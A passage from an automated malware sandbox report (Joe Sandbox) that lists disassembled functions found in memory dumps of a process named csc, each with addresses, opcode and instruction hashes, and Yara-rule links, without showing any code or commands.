                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                  • Instruction ID: dab17c8f93034705b4e07153138fe4f66cbfd484410ae90b576aee3a5e963def
                                                                                  • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                  • Instruction Fuzzy Hash: DFF05E31286610DFDB35AE15E94AF6276A2BB44731F144A19A05A0A8B1CA70AC46EA45
                                                                                  Function 05778EF5 Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43b83aeb99fdcfe674345aec51568496126895efab5bdcd6da8d38e325a1b0a8
                                                                                  • Instruction ID: 0475cdda987259dcfb1232a3ca66f6d30f6908717dcedb423d4383f04795d923
                                                                                  • Opcode Fuzzy Hash: 43b83aeb99fdcfe674345aec51568496126895efab5bdcd6da8d38e325a1b0a8
                                                                                  • Instruction Fuzzy Hash: 1AE0927473E5584BCF324F20F6187AC3B93BB01694F491499E855ABA03CA18E803FA42
                                                                                  Function 057425E0 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ca0358b67606625ba9c0a31cf15d15d1d62e997acde76e0d89f01e0bdf3e0d1a
                                                                                  • Instruction ID: 4f9feaf66220633c4af3c028880422b40abab884f35b5254accd56e84af8a71e
                                                                                  • Opcode Fuzzy Hash: ca0358b67606625ba9c0a31cf15d15d1d62e997acde76e0d89f01e0bdf3e0d1a
                                                                                  • Instruction Fuzzy Hash: EBE09232200554ABC712BF29DD0DF9A7BDAEF503A0F114925B115571A1CB30A810EB98
                                                                                  Function 057C4000 Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                  • Instruction ID: 9500d44da2d225774dab701c71252d537da528aac9f56007b0b5de669f176e5a
                                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                  • Instruction Fuzzy Hash: 5CE0AE343442058BDB15CF19C050B627BB6BFD5B11F28C0ACA8498F205EB32A8829A40
                                                                                  Function 0573823B Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                  • Instruction ID: a0ab09e9521bfd7da0a50489ce7f11e37f3bedb0bcd774bdf35f75cdd114dd44
                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                  • Instruction Fuzzy Hash: 9AE08C31246A20EFDB316E21EC09F617AA2FB44B61F294829F085060A586B4AC81FA55
                                                                                  Function 05738C8D Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                  • Instruction ID: 0f6de57083af3575af2767f982e76662b538e8305e054c0b9a4f596c33ee04dc
                                                                                  • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                  • Instruction Fuzzy Hash: 27E08631543A20DEDB316F16ED0DF6276A2BB40B21F104C69B016094B18B74AC95F696
                                                                                  Function 05742050 Relevance: .0, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8de842a44c5dd17ff1221a7448cf329e14966350c2247f119a20273ab0cec3f7
                                                                                  • Instruction ID: ad0f81553fd195be1de2ce60dddae7243ba56af2ca3e909a95291a36986f46cf
                                                                                  • Opcode Fuzzy Hash: 8de842a44c5dd17ff1221a7448cf329e14966350c2247f119a20273ab0cec3f7
                                                                                  • Instruction Fuzzy Hash: 2AE08C322004506BC712FE5DDD09F4A779AEF942A0F100521B550876A0CB60AC00EBA4
                                                                                  Function 0040AD68 Relevance: .0, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 59315e4f5a81889f17a598e714690f649e20e23951fff8973887faef67e2e24f
                                                                                  • Instruction ID: 58942368bf2a5d1b9df030a650b51fcc9bd5b8fbd764112ecb7c4d5f658dbb2c
                                                                                  • Opcode Fuzzy Hash: 59315e4f5a81889f17a598e714690f649e20e23951fff8973887faef67e2e24f
                                                                                  • Instruction Fuzzy Hash: 18E02B3800A9C197C3079B319471C45BFE4EF1324875859CDD8C55B113DA204529C341
                                                                                  Function 0577E59C Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                  • Instruction ID: 59cee58476bb8234d9af037874dc6f622b68b8d45e66a8701d0d60ae23a992e8
                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                  • Instruction Fuzzy Hash: 77D0C7326545505BDB719A1CFC04FD373D9BB48761F150859B515C7150C7A5AC41D644
                                                                                  Function 0573A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                  • Instruction ID: a15197e8386e4d33ad84df18f56c5ed3b5a5b96346209fec1b1353de6b2516e2
                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                  • Instruction Fuzzy Hash: 65D0223232703093CB289A50A809F636A16AB80AB0F2A006C380A93800C4048C42E2E0
                                                                                  Function 0577CF50 Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d34698189322a78e13a95060ccbf2448498ff1481ef1a45962813432f2d339e
                                                                                  • Instruction ID: 93530c4358c029f11459bd4f4ccc8a04ce1ca76536668669bf617bd4efb54b6f
                                                                                  • Opcode Fuzzy Hash: 1d34698189322a78e13a95060ccbf2448498ff1481ef1a45962813432f2d339e
                                                                                  • Instruction Fuzzy Hash: 32D0A732110144ABC702FF09CD45F053B6AEF94790F000420B80447662CB30FC60DA58
                                                                                  Function 057502A0 Relevance: .0, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                  • Instruction ID: 71708deb4a47dc4bb57b989796704eac794ec2a0f84c287a57424c1cac98e415
                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                  • Instruction Fuzzy Hash: 33D0C935216E80CFD62ACB0CC5A8F1573A5BB84B54FC10490E802CBB21DAACE940DA00
                                                                                  Function 0577CF1F Relevance: .0, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5864aa3b373dc6b58e8fc7e4474854f5e5376bd16ae131bb015bc4a669649d52
                                                                                  • Instruction ID: a2343692223644c7dab3463ee672164490b3418d75d4f2f73b82310f71243d10
                                                                                  • Opcode Fuzzy Hash: 5864aa3b373dc6b58e8fc7e4474854f5e5376bd16ae131bb015bc4a669649d52
                                                                                  • Instruction Fuzzy Hash: CBD05E72121440EFDB26CB08C94AF2577A4FB00744F4544B8A0068B920D728E900EB40
                                                                                  Function 0577C700 Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                  • Instruction ID: 42bd2b0f7fee35533bc15bad780ba3f05b54b9bb0ad05d7464d948ea6faba14f
                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                  • Instruction Fuzzy Hash: 39C08033250644AFC711DF94CD05F0177A9E798B50F100421F70447570C571FC10E644
                                                                                  Function 05760310 Relevance: .0, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                  • Instruction ID: 596694d9de349a16f1ba3d918b3cc47e90efdc7e6a040275e71ec183bccef46b
                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                  • Instruction Fuzzy Hash: B9D01236200288EFCB05DF41C894D9A772AFBC8710F108019FD19076108A31ED62DA50
                                                                                  Function 05740750 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                  • Instruction ID: 31da8ba89488a836138212f70b44bf240d9b0e4ad7f8c0ff7540da549f7e60a9
                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                  • Instruction Fuzzy Hash: 92C04879701A418FCF19DF2AE298F5977F8FB44790F150890EC46CBB21E664E801EA20
                                                                                  Function 057F6F00 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                  • Instruction ID: b50fcfa598f0022c1a7b81f06bbfe318ff6bf39c60d9932f77acb9b6263b11cb
                                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                  • Instruction Fuzzy Hash: 59C09B6F1556C149CD17CF3553127E4BFA1D7425D4F5D14C5D4D11F613C1144513D725
                                                                                  Function 05814DAD Relevance: .0, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                  • Instruction ID: 68ad5981adcab4e0dbfb7d8738c40f72a1c3351ae73f9b5be4e356a5b1aa4363
                                                                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                  • Instruction Fuzzy Hash: 3EB01232312544CFC7026720CB08F1832A9BF017C0F0A00F0690089831D6188910F501
                                                                                  Function 05784650 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94257fc07d05ce2c546fdd92545a8a6395f6318bbc9b6054067923aac4d970a9
                                                                                  • Instruction ID: 2e0ca4e5c8a63be0680d6a0168c88b63f4e72d3bd5adde846aeffd5af00a9e97
                                                                                  • Opcode Fuzzy Hash: 94257fc07d05ce2c546fdd92545a8a6395f6318bbc9b6054067923aac4d970a9
                                                                                  • Instruction Fuzzy Hash: 1F900262601500424544715858444066015D7F23013D5C125A0558570C86188955A27F
                                                                                  Function 05784340 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e85ce1dc2ab0fb40804c34522dd07dc14dcc32bd85ffc7ff14d6dfb9d64c06ac
                                                                                  • Instruction ID: 99daca16eaf88b5af2c0cd62e9b633c1fb5950b17bb1e342d6e457a5ee32b4fe
                                                                                  • Opcode Fuzzy Hash: e85ce1dc2ab0fb40804c34522dd07dc14dcc32bd85ffc7ff14d6dfb9d64c06ac
                                                                                  • Instruction Fuzzy Hash: F6900232605800129544715858C45464015D7F1301B95C021E0428564C8A148A566377
                                                                                  Function 05782D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b55022467ca55031a83b72ecc0a4020e0c618b712c0f7ee14786b174efff6c82
                                                                                  • Instruction ID: d60d39015dc9054a2cddb5dc1f2cd628f45fe00bd41e565239ac318357da118d
                                                                                  • Opcode Fuzzy Hash: b55022467ca55031a83b72ecc0a4020e0c618b712c0f7ee14786b174efff6c82
                                                                                  • Instruction Fuzzy Hash: 4E90022230140003D544715864586064015D7F2301F95D021E0418564CD91589566237
                                                                                  Function 05782D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82b607f4c9e537b203c2eb31d8c66c733615719df19156c71249370503d1476c
                                                                                  • Instruction ID: eba8b102f439caaa0cee51b9fb43aa8f7e6e0f61bf823432e8150335acf19702
                                                                                  • Opcode Fuzzy Hash: 82b607f4c9e537b203c2eb31d8c66c733615719df19156c71249370503d1476c
                                                                                  • Instruction Fuzzy Hash: 8990022A21340002D5847158644860A0015C7E2202FD5D425A0019568CC91589696337
                                                                                  Function 05782D00 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e26ba3f4f89d14ec5341039bae77750f92ced86d0c26ed5bc0738df5e6fb0532
                                                                                  • Instruction ID: 057dfef788616f049e3031ad471a0f3fa3ea52f797f3c1daa35beef24f3e8fa0
                                                                                  • Opcode Fuzzy Hash: e26ba3f4f89d14ec5341039bae77750f92ced86d0c26ed5bc0738df5e6fb0532
                                                                                  • Instruction Fuzzy Hash: 3E90022220544442D50475586448A060015C7E1205F95D021A10685A5DC6358951B137
                                                                                  Function 05782DD0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e01b4b8ecb719dfaa36031a14573c325343eeb71e3d8e73e6476ca0bc0d1874c
                                                                                  • Instruction ID: 1fad83ce6c41dc8a688f674d53488845cbd1e22b84b4ae517413b9a1f6a3c15d
                                                                                  • Opcode Fuzzy Hash: e01b4b8ecb719dfaa36031a14573c325343eeb71e3d8e73e6476ca0bc0d1874c
                                                                                  • Instruction Fuzzy Hash: 28900222242441525949B15854445074016D7F12417D5C022A1418960C85269956E637
                                                                                  Function 05782DB0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8737024a8d74953b3b35c1be85c51ce29a4be3d5451179af7d9755e1eccd3efc
                                                                                  • Instruction ID: 913f5f982d9c0380331e355eb959e27bf02bd3c1e855af57a0de79942bfcb654
                                                                                  • Opcode Fuzzy Hash: 8737024a8d74953b3b35c1be85c51ce29a4be3d5451179af7d9755e1eccd3efc
                                                                                  • Instruction Fuzzy Hash: 7A90023224140402D545715854446060019D7E1241FD5C022A0428564E86558B56BA77
                                                                                  Function 05782C60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5abec2ea18bef0755e01188c6b124731adee6aa8353b3204a7bef1e2117dea4e
                                                                                  • Instruction ID: 6d76e7c9f5d8fd6a7ab790644d333d4f0f9b72ebdd3fa2231e1c5ab422008280
                                                                                  • Opcode Fuzzy Hash: 5abec2ea18bef0755e01188c6b124731adee6aa8353b3204a7bef1e2117dea4e
                                                                                  • Instruction Fuzzy Hash: 1B90023220140842D50471585444B460015C7F1301F95C026A0128664D8615C9517537
                                                                                  Function 05782CF0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7fdc5eef0835a46bded0b25688eb362f9baddd08703b8c5d0c1fe23d2efaecb4
                                                                                  • Instruction ID: 973f002fde27cb4451201036a179ac0255ab3c31d90ac4a8e4ca85c616fdd3f7
                                                                                  • Opcode Fuzzy Hash: 7fdc5eef0835a46bded0b25688eb362f9baddd08703b8c5d0c1fe23d2efaecb4
                                                                                  • Instruction Fuzzy Hash: 4690023220140403D504715865487070015C7E1201F95D421A0428568DD65689517137
                                                                                  Function 05782CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ce4cd01b83eb3430a7b053a08e6ae3a09555808f2ba5800d632b5c4f0b604e1
                                                                                  • Instruction ID: 0108839e3b264935d3d8786eaa854d990edb9d60825bab9b27477f41c312599f
                                                                                  • Opcode Fuzzy Hash: 3ce4cd01b83eb3430a7b053a08e6ae3a09555808f2ba5800d632b5c4f0b604e1
                                                                                  • Instruction Fuzzy Hash: 3490022260540402D544715864587060025C7E1201F95D021A0028564DC6598B5576B7
                                                                                  Function 05782CA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7b40e2586b4d4a73016a3314a3190a060c11e18e60fe94d0e23dbd62bd9f5c98
                                                                                  • Instruction ID: 2168be5d9fbae4783c308487afb4b92dd2f71248588ce63246908cfabebbc5f8
                                                                                  • Opcode Fuzzy Hash: 7b40e2586b4d4a73016a3314a3190a060c11e18e60fe94d0e23dbd62bd9f5c98
                                                                                  • Instruction Fuzzy Hash: 5E90023220140402D504759864486460015C7F1301F95D021A5028565EC66589917137
                                                                                  Function 05782F60 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43d60045d4e219e912f068831cb29097f6ac2fb0287487317a9db44ebcc301f3
                                                                                  • Instruction ID: 3edbf67cb7ee58b5ef30994b99f27270fdc744b04188d8ceefbad189b497a906
                                                                                  • Opcode Fuzzy Hash: 43d60045d4e219e912f068831cb29097f6ac2fb0287487317a9db44ebcc301f3
                                                                                  • Instruction Fuzzy Hash: 5390026221140042D508715854447060055C7F2201F95C022A2158564CC5298D61613B
                                                                                  Function 05782F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8151353e89552459dafefd88b8225c569fe4d3379b25d05120beb1c37deeff9c
                                                                                  • Instruction ID: a3813e4afde8477c7d2bd62844de3ff58d02825d493abf3825ef555af826b714
                                                                                  • Opcode Fuzzy Hash: 8151353e89552459dafefd88b8225c569fe4d3379b25d05120beb1c37deeff9c
                                                                                  • Instruction Fuzzy Hash: DE90026234140442D50471585454B060015C7F2301F95C025E1068564D8619CD52713B
                                                                                  Function 05782FE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
